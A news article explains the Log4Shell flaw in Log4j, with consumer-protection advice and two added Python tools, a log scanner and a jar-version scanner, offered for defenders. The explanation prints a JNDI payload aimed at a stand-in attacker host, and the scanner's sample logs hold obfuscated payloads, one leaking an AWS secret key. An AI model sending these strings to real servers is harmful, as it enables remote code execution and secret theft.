The very serious server-software flaw named "Log4Shell" that affected many Minecraft players at the end of last week has, as feared, come to affect the entire internet. In terms of potential impact, it's one of the most severe computer-security vulnerabilities the world has ever seen.
"I cannot overstate the seriousness of this threat," researcher Lotem Finkelstein of Israeli security firm Check Point told ZDNet.
His firm has seen more than 850,000 attempted attacks on servers since a working exploit for the vulnerability was posted online Thursday (Dec. 9). Antivirus firm ESET said the U.S., U.K., Turkey, Germany and the Netherlands were seeing the most attacks.
The good news: This flaw doesn't directly affect the average computer user. The exceptions are Minecraft players using the Java Edition and anyone running a Java application that uses Log4j to log data an attacker can influence, which on a home PC is rare; merely having Java installed does not by itself make a machine exploitable.
The fix is to Log4j, not to Java itself. A patched release that mitigated the flaw went up Dec. 8 and a fuller fix followed Dec. 13, and Apache has shipped further follow-up releases since, so anyone patching should take the current version rather than the first fix. Installing it helps only if you run a Java application that uses Log4j, which usually means a server. (Minecraft users just need to update their client software.)
The bad news: Hundreds of thousands, perhaps millions, of web servers are affected and can be hacked with very little effort. Criminals are already using the flaw to install coin-mining, botnet and backdoor malware on servers, report Microsoft and the Swiss government.
The flaw has been given the maximum severity score, 10 out of 10 on the CVSS scale, by the Apache Software Foundation, which maintains the software.
"There is an extremely high chance, almost certain, that every person interacts with some software or technology that has this vulnerability tucked away somewhere," Huntress Labs researcher John Hammond told Dark Reading.
Servers run by Amazon, Apple, Baidu, LinkedIn, QQ, Steam, Tencent, Tesla and Twitter are or until recently were vulnerable to some extent, although internal safeguards may prevent further exploitation in each case.
(There are reports that Apple has patched its servers, but we couldn't find the original source for those reports, and Apple has not yet responded to our request for confirmation.)
We can expect to see a lot of data breaches, ransomware attacks, credit-card thefts and perhaps even "drive-by downloads" resulting from this flaw. If anything is stored on a web server, it's at risk.
Bitdefender reported Dec. 13 that it had observed online criminals using the Log4Shell flaw to install ransomware and remote-access Trojans on Windows PCs, but it wasn't clear whether the affected PCs had Java previously installed or not. We've reached out to Bitdefender for clarification.
Way more. We’re seeing >1,000 attempted exploits per second. And payloads getting scarier. Ransomware payloads started in force in last 24 hours.
(Twitter, December 14, 2021)
Log4Shell: 'Unbelievably simple' attack
"The exploit is actually unbelievably simple — which makes it very, very scary at the same time," Bojan Zdrnja of the non-profit SANS Institute told Vice Motherboard.
All an attacker needs to do is send the server a short string of carefully crafted text. It can be a forum post, a username in a login attempt, an HTTP header such as the browser's User-Agent, or any other input that a server would ordinarily write to its logs alongside hundreds of thousands of daily entries.
The trick is that Log4j does not simply record that text: if it contains an expression of the form ${...}, Log4j evaluates it. A string such as ${jndi:ldap://attacker.example/x} (with attacker.example standing in for a server the attacker controls) makes the targeted server reach out to that address, and the reply can point it at a piece of Java code to download and run, which the server then does. Other expressions expand to secrets held by the server, such as environment variables, so the same mechanism can be used to make the server leak them in that outgoing request.
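As an added example (not code from the article, from Log4j or from any firm quoted here), the Python script below does what a defender reading web-server logs for this attack needs: it undoes the obfuscation attackers wrapped around that string and reports the address a vulnerable Log4j would have contacted. It goes beyond the single expression in the text by handling the nested, case-mangled and default-value variants seen in the wild. The log lines it scans are constructed, and the 198.51.100.x and 203.0.113.x addresses are documentation ranges, not real infrastructure.

```python
"""Log4Shell payload normalizer and log scanner (added example, not from the
article or Log4j). Models just enough of Log4j 2's "${...}" lookup syntax to
collapse the obfuscated forms attackers used (nested lookups, ${lower:} and
${upper:}, the ":-" default trick) back to a canonical "${jndi:...}" and to
report the URI a vulnerable logger would have handed to JNDI. Nothing is ever
resolved for real: env:/sys:/date: lookups are kept verbatim."""
import re

_INNER = re.compile(r"\$\{([^{}]*)\}")   # an innermost ${...}: no brace inside
_OPEN, _CLOSE = "\x00", "\x01"            # placeholders for lookups kept as-is


def _restore(s):
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")


def normalize(text):
    """Resolve nested lookups innermost-first, as Log4j's StrSubstitutor does.

    Returns (normalized_text, jndi_targets): the text with obfuscation
    collapsed, and every string a vulnerable Log4j would have passed to its
    JNDI lookup (the attacker's ldap://, rmi://, dns://... URI)."""
    jndi_targets = []

    def resolve(match):
        body = match.group(1)
        key, has_default, default = body.partition(":-")   # ${key:-default}
        prefix, sep, name = key.partition(":")
        prefix = prefix.lower()                            # prefixes are case-insensitive
        if sep and prefix == "lower":
            return name.lower()
        if sep and prefix == "upper":
            return name.upper()
        if sep and prefix == "jndi":
            jndi_targets.append(_restore(name))
            return _OPEN + "jndi:" + name + _CLOSE         # keep, in canonical form
        if has_default:
            return default      # unknown key, e.g. ${::-j} or ${env:NOPE:-j} -> default
        return _OPEN + body + _CLOSE                       # env:, sys:, date:... untouched

    prev = None
    while prev != text:                                    # until no lookup is left
        prev, text = text, _INNER.sub(resolve, text)
    return _restore(text), jndi_targets


def exfil_lookups(jndi_target):
    """Lookups left inside a JNDI URI leak server state in the outbound request
    (a subset of Log4j's lookup prefixes that read environment or JVM data)."""
    return re.findall(r"\$\{(?:env|sys|java|main|bundle):[^}]*\}", jndi_target, re.I)


def scan(lines):
    """Return [(line_no, normalized_line, jndi_targets)] for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        normalized, targets = normalize(line)
        if targets:
            hits.append((n, normalized, targets))
    return hits


SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.5:1389/b}"',
    '203.0.113.10 - - "POST /login HTTP/1.1" 401 "${${env:NOPE:-j}ndi:rmi://198.51.100.5:1099/c}"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.5/d}"',
    '203.0.113.12 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for n, normalized, targets in scan(SAMPLE_LOG):
        print(f"line {n}: {targets}")
        for leak in exfil_lookups(targets[0]):
            print(f"  exfiltrates {leak}")
```

Grepping logs for the literal text "jndi:" misses the third and fourth sample lines; resolving the lookups the way Log4j itself does is what catches them. Any hit is an exploit attempt, and the next step is to check the server's outbound connections for the reported address, since a successful attempt shows up as a connection to it.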
One jokester even put the exploit code into the name of his iPhone and got an Apple server to respond.
Jen Easterly, director of the U.S. federal government's Cybersecurity and Infrastructure Security Agency (CISA) called this flaw a "severe risk" and "an urgent challenge to network defenders" in an official advisory.
CyberScoop reported that in a call with tech-company executives Monday, Easterly said the vulnerability "is one of the most serious I've seen in my entire career, if not the most serious."
What can you do to defend yourself from Log4Shell?
As an end user, there's nothing you can do to fix the affected servers. On your own machine, the most you can do is update or remove any Java applications you run, since one of them could bundle Log4j. (Security experts recommended that PC and Mac users disable Java years ago, and there are few reasons to use it nowadays.)
However, because online criminals will exploit this flaw any way they can, you need to prepare yourself for the worst.
Expect that your personal information will be disclosed in data breaches resulting from this flaw, and that you will be at greater risk of identity theft. Expect that some of your passwords will be stolen and some of your online accounts hijacked.
Expect that your favorite online retail websites will be hacked to steal your credit-card number, a likelihood compounded by the holiday shopping season. Expect that some websites you frequently visit will be corrupted to send you malware.
In other words, the risks that you already face online will be dialed up to the maximum. Here's what you need to do.
Sign up with and use a password manager. There's no excuse not to do this, as many of the best password managers are partly or totally free. Use the password manager to make sure all your passwords are strong and unique. You want to do this today, not tomorrow, so that if one of your account passwords is compromised, only one account will be in danger, not all of them.
Set up a free credit freeze to limit the damage from potential identity theft. You may also want to consider one of the best identity theft protection services, but the credit freeze is the best preventive measure you can take.
Monitor your credit-card accounts for the next few weeks. If you see anything that looks wrong, call the phone number on the back of the card and tell the bank that issued the card right away.
Monitor your credit reports for the next few months. Through April 2022, U.S. residents can get a free credit report from each of the three big credit bureaus (Equifax, Experian and TransUnion) every week.
Install some of the best antivirus software. Windows 10 and 11 already have Microsoft Defender Antivirus built in, and it's very good, but it doesn't protect you from web-based threats coming in through non-Microsoft browsers such as Google Chrome or Mozilla Firefox. Microsoft Defender also doesn't help much with Android, Mac or iOS.
To be fair, all of these recommendations are things that you really ought to be doing anyway. But the fact that half the internet is in immediate danger of being horribly hacked makes these safeguards crucially important.
Log4Shell flaw explained
Very briefly, the Log4Shell flaw, catalogued as CVE-2021-44228, lies in a piece of open-source software called Log4j, a logging library used by a huge number of Java applications (versions 2.0-beta9 through 2.14.1 of the Log4j 2 branch are affected) and maintained by unpaid volunteers under the Apache Software Foundation.
This incident has renewed calls for the huge corporations that use open-source code to kick back some cash to the developers, who work on these tools in their spare time.
If you use software made by others in their spare time and find it useful, pay them. This should not be a controversial opinion. https://t.co/XDMFIcTlsW
(Twitter, December 11, 2021)
A logging library is meant simply to record events, not to act on them. But Log4j 2 scans the text it logs for ${...} expressions and evaluates them, and one of the lookups it supports, JNDI, will connect to whatever server the expression names and load what it gets back. That is how an attacker can, as described above, turn a string in a log entry into code running on the Java-based server.
Because Java is a cross-platform environment designed to run on many kinds of operating systems, servers running Windows, Linux, Unix or even macOS are all vulnerable if they use an affected version of Log4j.
The underlying technique, making a Java program load code through a JNDI lookup, was demonstrated at Black Hat in 2016. This particular vulnerability in Log4j was reported Nov. 24 to the Apache Foundation by researchers with Chinese internet giant Alibaba, and a fix was quietly developed over the following two weeks and released Dec. 8.
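For anyone who runs a Java application, the first practical check is whether it ships an affected Log4j at all, and the copy is often buried inside a .war or .ear rather than sitting on disk as a plain jar. The following Python scanner is an added example, not code from the article, from Apache or from any tool mentioned here. It builds a small constructed directory of fake jars (the class-file bytes and pom.properties contents are stand-ins, not real Log4j artifacts) and classifies what it finds using the published version cut-offs for CVE-2021-44228. On a real host you would point scan_tree at the application's install directory instead.

```python
"""Find Log4j 2 copies under a directory, including jars nested inside wars and
ears, and classify each against CVE-2021-44228. Added example, not code from
the article or the Log4j project. Cut-offs are the published ones: 2.0-beta9
through 2.14.1 affected, 2.15.0 a partial fix, 2.16.0 and later fixed."""
import io
import pathlib
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def classify(version, has_jndi_lookup):
    """Verdict for one log4j-core archive. Version wins over class presence,
    because fixed releases still ship JndiLookup.class with JNDI disabled."""
    v = parse_version(version) if version else None
    if v is None:
        return "log4j-core: version unknown, inspect manually"
    if v[0] != 2:
        return "not Log4j 2: CVE-2021-44228 does not apply"
    if v[1:] >= (16, 0):
        return "fixed (2.16.0 or later)"
    if v[1:] >= (15, 0):
        return "2.15.0: partial fix, upgrade"
    if not has_jndi_lookup:
        return "vulnerable version, but JndiLookup.class removed (mitigated)"
    return "VULNERABLE to CVE-2021-44228"


def inspect_archive(data, label):
    """Yield (label, version, verdict) for every log4j-core in an archive,
    descending into nested archives (e.g. WEB-INF/lib/*.jar inside a .war)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:                       # Maven metadata names the version
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is not None or JNDI_CLASS in names:
        yield label, version, classify(version, JNDI_CLASS in names)
    for inner in names:
        if inner.lower().endswith(ARCHIVES):
            yield from inspect_archive(zf.read(inner), label + "!/" + inner)


def scan_tree(root):
    """Walk root and return findings for every archive under it."""
    findings = []
    for path in sorted(pathlib.Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            findings.extend(inspect_archive(path.read_bytes(), path.as_posix()))
    return findings


def _fake_log4j(version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: metadata plus a dummy class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed layout: a vulnerable jar, a copy with the class deleted
    (the stop-gap mitigation), and a war that bundles a fixed release."""
    lib = pathlib.Path(root) / "lib"
    lib.mkdir()
    (lib / "log4j-core-2.14.1.jar").write_bytes(_fake_log4j("2.14.1"))
    (lib / "log4j-core-2.14.1-stripped.jar").write_bytes(_fake_log4j("2.14.1", False))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _fake_log4j("2.16.0"))
    (pathlib.Path(root) / "app.war").write_bytes(war.getvalue())


def demo():
    """Build the sample tree in a temp dir, scan it, return {label: verdict}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        prefix = len(pathlib.Path(tmp).as_posix()) + 1
        return {label[prefix:]: verdict for label, _, verdict in scan_tree(tmp)}


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{verdict:62} {label}")
```

The verdict goes by version first: later releases still contain JndiLookup.class but ship with JNDI lookups disabled, so the class being present proves nothing on its own, while its absence from an old jar is the sign of the known stop-gap of deleting it from the archive where an upgrade was not possible. A copy with no Maven metadata is reported for manual inspection rather than guessed at.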
Mass attacks using the flaw began as soon as the proof-of-concept code was posted early the next morning. Internet-security firms Cloudflare and Cisco Talos checked their logs, however, and found evidence of possible exploit attempts as far back as Dec. 1.
Those "attempts" may have been the result of defenders pinging servers to see how widespread the vulnerability was. But it could also be that the flaw was privately leaked to state-sponsored security services, as a different flaw may have been earlier this year.
Updated with additional information. This story was originally posted Dec. 13.